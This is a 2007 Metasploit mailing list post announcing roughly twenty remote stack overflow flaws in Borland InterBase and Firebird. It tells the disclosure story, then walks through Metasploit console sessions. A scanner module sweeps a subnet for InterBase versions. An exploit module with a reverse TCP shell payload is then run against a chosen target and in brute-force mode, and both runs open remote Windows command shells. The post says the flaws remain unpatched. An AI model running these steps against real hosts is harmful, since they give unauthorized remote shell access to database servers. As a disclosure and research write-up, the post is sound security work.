Metasploit mailing list archives

Previous By Date Next
Previous By Thread Next

InterBase/Firebird Fun

From: ramon at risesecurity.org (Ramon de Carvalho Valle)
Date: Fri, 05 Oct 2007 21:56:51 -0300
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

While developing an exploit module for a buffer overflow vulnerability
published byTippingPoint in Borland InterBase, we decided to do a quick
look into Borland InterBase code, and unfortunately, the results were no
good.

We found about 20 buffer overflow vulnerabilities that affects all
versions of Borland InterBase, and some of them also affects the
Firebird Relational Database. All remote, trivial to exploit,
stack-based buffer overflows.

We contacted both Borland/CodeGear and Firebird developers about these
vulnerabilities. After failed attempts to find an email address to
report security issues in their products, we tried their bug tracking
systems. Borland/CodeGear asked us to send information to their support
email address, but we didn't get any further responses. Firebird
developers didn't answer to our reports either, but they corrected these
vulnerabilities in the latest version of Firebird.

We published the advisories, exploit modules for some of these
vulnerabiliities, and an auxiliary scanner module for Metasploit
Framework 3.

The auxiliary scanner module searches for running InterBase/Firebird
instances on an address range and retrieves version and implementation
of the InterBase server from InterBase Services Manager.
This auxiliary module can be used to determine the exact target will be
used in an exploitation scenario.


msf > use auxiliary/scanner/misc/ib_service_mgr_info
msf auxiliary(ib_service_mgr_info) > set RHOSTS 192.168.213.0/24
RHOSTS => 192.168.213.0/24
msf auxiliary(ib_service_mgr_info) > run
[*] Trying 192.168.213.0
[*] Trying 192.168.213.1
[*] Trying 192.168.213.2
...
[*] Trying 192.168.213.132
IP Address: 192.168.213.132
Version of the InterBase server: WI-V6.0.1.0
Implementation of the InterBase server: InterBase/x86/Windows NT

...
[*] Trying 192.168.213.253
[*] Trying 192.168.213.254
[*] Trying 192.168.213.255
[*] Auxiliary module execution completed
msf auxiliary(ib_service_mgr_info) >


Using this information, one can select the exact target from one of our
published exploit modules.


msf auxiliary(ib_service_mgr_info) > use windows/misc/ib_isc_attach_database
msf exploit(ib_isc_attach_database) > set RHOST 192.168.213.132
RHOST => 192.168.213.132
msf exploit(ib_isc_attach_database) > set LHOST 192.168.0.4
LHOST => 192.168.0.4
msf exploit(ib_isc_attach_database) > set PAYLOAD windows/shell_reverse_tcp
PAYLOAD => windows/shell_reverse_tcp
msf exploit(ib_isc_attach_database) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Brute Force
   1   Borland InterBase WI-V8.1.0.257
   2   Borland InterBase WI-V8.0.0.123
   3   Borland InterBase WI-V7.5.0.129 WI-V7.5.1.80
   4   Borland InterBase WI-V7.0.1.1
   5   Borland InterBase WI-V6.5.0.28
   6   Borland InterBase WI-V6.0.1.6
   7   Borland InterBase WI-V6.0.0.627 WI-V6.0.1.0 WI-O6.0.1.6 WI-O6.0.2.0
   8   Borland InterBase WI-V5.5.0.742
   9   Borland InterBase WI-V5.1.1.680
   10  Debug


msf exploit(ib_isc_attach_database) > set TARGET 7
TARGET => 7
msf exploit(ib_isc_attach_database) > exploit
[*] Started reverse handler
[*] Command shell session 1 opened (192.168.0.4:4444 -> 192.168.0.4:33891)

Microsoft Windows XP [vers?o 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>


The brute force option assumes that ibguard/fbguard is running and tries
every available target from an exploit module sequentially.


msf exploit(ib_isc_attach_database) > set TARGET 0
TARGET => 0
msf exploit(ib_isc_attach_database) > exploit
[*] Started reverse handler
[*] Brute forcing with 10 possible targets
[*] Trying target Borland InterBase WI-V8.1.0.257...
[*] Trying target Borland InterBase WI-V8.0.0.123...
[*] Trying target Borland InterBase WI-V7.5.0.129 WI-V7.5.1.80...
[*] Trying target Borland InterBase WI-V7.0.1.1...
[*] Trying target Borland InterBase WI-V6.5.0.28...
[*] Trying target Borland InterBase WI-V6.0.1.6...
[*] Trying target Borland InterBase WI-V6.0.0.627 WI-V6.0.1.0
WI-O6.0.1.6 WI-O6.0.2.0...
[*] Command shell session 2 opened (192.168.0.4:4444 -> 192.168.0.4:33942)

Microsoft Windows XP [vers?o 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>


It is important to note that all Borland InterBase vulnerabilities
published by us were not corrected by the vendor and are present in all
(including the latest) versions of their product.

The original blog post, advisories and modules can be found in our
website at http://risesecurity.org/.


Best regards,
Ramon
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.6 (GNU/Linux)

iD8DBQFHBt1TGIS0iEuhp4MRAqH9AJ9QM5N4mxxAe88uvc0YNGH5JU55kACgr4EI
xwreRuy00uurdf/3bchwKAQ=
=dV8W
-----END PGP SIGNATURE-----
Previous By Date Next
Previous By Thread Next

Current thread: